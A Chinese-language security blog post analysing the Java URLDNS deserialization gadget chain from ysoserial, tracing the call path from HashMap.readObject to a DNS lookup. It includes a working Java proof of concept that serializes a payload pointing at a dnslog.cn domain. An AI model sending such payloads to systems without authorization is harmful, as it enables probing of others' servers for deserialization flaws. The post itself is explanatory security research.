URLDNS链分析

准备

URLDNS链是反序列化中比较简单的一个链,它不受第三方依赖和版本的限制,所以通常用来判断是否存在反序列化。

ysoserialize项目地址:https://github.com/frohoff/ysoserial

先用ysoserial测试是否可用

W4D2K1.png

然后readObject()触发

W4DKDP.png

成功在DNSlog接收到请求

W4DhVK.png

分析URLDNS链

首先漏洞触发点是在HashMapreadObject()

对传入序列化数据流进行反序列化

W4r1qx.png

W4rGdK.png

可以看到在putVal()中对key进行了Hash()处理

W4rcFS.png

再进入到URL.hashCode()

W4rjyR.png

handler属性默认是URLStreamHandler

W4fowj.png

URLStreamHandler.hashCode()中直接调用getHostAddress()getByName()会对url参数进行解析操作,从而发起一次dnslog请求。

W4sfhD.png

W4W1UI.png

利用链到此为止

1
2
3
4
5
6
HashMap -> readObject()
HashMap -> putval()
HashMap -> hash()
URL -> hashCode()
URLStreamHandler -> hashCode()
URLStreamHandler -> getHostAddress()

但是注意到在生成payload时候对HashMap进行了Put操作,而put函数里也有putVal处理

W46bY8.png

所以在生成payload时候也发送了dnslog请求,我们得规避这种情况。

在上面可以看到URL.hashCode()中有个判断,如果hashCode不等于-1那就直接return

W46VdP.png

所以可以利用反射来在put之前修改它的值,再之后又修改回-1

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
    public static void main(String[] args) throws Exception{
        //生成payload
        HashMap map=new HashMap();
        URL url=new URL("http://jrelef.dnslog.cn");
        //反射修改hashCode
        Class cls=Class.forName("java.net.URL");
        Field hashCode=cls.getDeclaredField("hashCode");
        hashCode.setAccessible(true);
        hashCode.set(url,123); //设置非 -1
        map.put(url,"Teabo123");
        hashCode.set(url,-1);  //设置 -1
        //生成序列化文件
        FileOutputStream out=new FileOutputStream("./Teabo1.bin");
        ObjectOutputStream out1=new ObjectOutputStream(out);
        out1.writeObject(map); //map对象序列化


        /*触发反序列化
        ObjectInputStream In=new ObjectInputStream(new FileInputStream("./Teabo.bin"));
        In.readObject();
         */
    }
}

Ysoserial中的URLDNS

首先在pom.xml找到入口类

W4cHBR.png

在解释器中添加运行时参数

W4gSjH.png

这样即可在项目中运行调试Poc

W4gKDs.png

在URLDNS链部分与上面分析的没出入,但是注意到ysoserialize.URLDNS并没有通过反射来防止在生成payload时触发getHostAdress()

W4gqMQ.png

而是在SilentURLStreamHandler()这个类中重写了getHostAddress(),这样在put过程中遇到getHostAddress()就直接返回Null了,不会发送请求。

W42lsH.png

那为什么在readObject时又能进入到正确的getHostAddress()

URL.handlertransient声明的,无法被序列化,所以在反序列化时依然能向dnslog发送请求

W4fowj.png

本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

摸爬滚打学习的web菜狗